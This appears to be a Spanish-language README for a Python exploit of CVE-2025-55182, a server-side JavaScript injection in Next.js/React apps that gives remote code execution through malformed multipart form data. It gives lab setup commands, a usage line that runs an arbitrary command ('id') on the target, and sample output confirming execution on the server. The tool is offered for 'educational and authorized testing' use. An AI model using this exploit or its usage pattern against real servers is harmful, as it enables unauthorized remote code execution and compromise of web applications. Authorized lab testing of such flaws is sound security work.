
Exploit en Python para CVE-2025-55182, una inyección de JavaScript del lado del servidor en Next.js/React que permite la ejecución remota de código mediante datos de formulario multipart malformados. Incluye configuración de laboratorio para pruebas autorizadas.
Script de Python 3 que puede utilizarse para demostrar CVE-2025-55182. Explota una vulnerabilidad de inyección de JavaScript del lado del servidor en aplicaciones Next.js/React, lo que permite la ejecución remota de código mediante datos de formulario multipart malformados.
⚠️ Solo para fines educativos y de pruebas autorizadas.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Dominio o IP de destino con protocolo - http://localhost:3000 -c Comando a ejecutar en el servidor - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)